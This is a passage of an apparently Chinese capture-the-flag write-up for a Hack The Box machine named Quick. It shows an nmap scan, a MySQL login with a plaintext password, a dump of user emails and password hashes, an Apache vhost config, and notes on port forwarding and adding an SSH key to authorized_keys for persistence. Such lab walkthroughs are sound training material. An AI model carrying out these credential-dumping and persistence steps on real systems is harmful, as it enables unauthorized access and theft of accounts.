Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-06 15:01 CST Nmap scan report for 10.10.10.186 Host is up (0.069s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 fb:b0:61:82:39:50:4b:21:a8:62:98:4c:9c:38:82:70 (RSA) | 256 ee:bb:4b:72:63:17:10:ee:08:ff:e5:86:71:fe:8f:80 (ECDSA) |_ 256 80:a6:c2:73:41:f0:35:4e:5f:61:a7:6a:50:ea:b8:2e (ED25519) 9001/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Quick | Broadband Services Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 117.27 seconds
sam@quick:/var/www/html$ mysql -u db_adm -p mysql -u db_adm -p Enter password: db_p4ss
Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 66 Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu)
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases; show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | quick | | sys | +--------------------+ 5 rows in set (0.00 sec)
mysql> use quick; use quick; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Database changed mysql> show tables; show tables; +-----------------+ | Tables_in_quick | +-----------------+ | jobs | | tickets | | users | +-----------------+ 3 rows in set (0.00 sec)
mysql> select * from users; select * from users; +--------------+------------------+----------------------------------+ | name | email | password | +--------------+------------------+----------------------------------+ | Elisa | elisa@wink.co.uk | c6c35ae1f3cb19438e0199cfa72a9d9d | | Server Admin | srvadm@quick.htb | e626d51f8fbfd1124fdea88396c35d05 | +--------------+------------------+----------------------------------+ 2 rows in set (0.00 sec)
sam@quick:/var/www$ ls ls html jobs printer sam@quick:/var/www$ cd printer cd printer sam@quick:/var/www/printer$ ls ls add_printer.php db.php favicon.ico home.php index.php printers.php css escpos-php fonts images job.php sam@quick:/var/www/printer$
sam@quick:/var/www/printer$ cd /etc/apache2/sites-enabled cd /etc/apache2/sites-enabled sam@quick:/etc/apache2/sites-enabled$ ls ls 000-default.conf sam@quick:/etc/apache2/sites-enabled$ cat 000-default.conf cat 000-default.conf <VirtualHost *:80> # The ServerName directive sets the request scheme, hostname and port that # the server uses to identify itself. This is used when creating # redirection URLs. In the context of virtual hosts, the ServerName # specifies what hostname must appear in the request's Host: header to # match this virtual host. For the default virtual host (this file) this # value is not decisive as it is used as a last resort host regardless. # However, you must set it for any further virtual host explicitly. #ServerName www.example.com
# Available loglevels: trace8, ..., trace1, debug, info, notice, warn, # error, crit, alert, emerg. # It is also possible to configure the loglevel for particular # modules, e.g. #LogLevel info ssl:warn
# For most configuration files from conf-available/, which are # enabled or disabled at a global level, it is possible to # include a line for only one particular virtual host. For example the # following line enables the CGI configuration for this host only # after it has been globally disabled with "a2disconf". #Include conf-available/serve-cgi-bin.conf </VirtualHost> <VirtualHost *:80> AssignUserId srvadm srvadm ServerName printerv2.quick.htb DocumentRoot /var/www/printer </VirtualHost> # vim: syntax=apache ts=4 sw=4 sts=4 sr noet
得到域名printerv2.quick.htb,然后应该是开在localhost的80端口
端口转发
我们可以将端口转发出来访问
添加公钥
首先我们可以把自己的ssh公钥加进去,方便后续操作:
1 2 3 4 5 6
sam@quick:~$ mkdir .ssh mkdir .ssh sam@quick:~$ cd .ssh cd .ssh sam@quick:~/.ssh$ echo 'ssh-rsa xxxx' >> authorized_keys sam@quick:~/.ssh$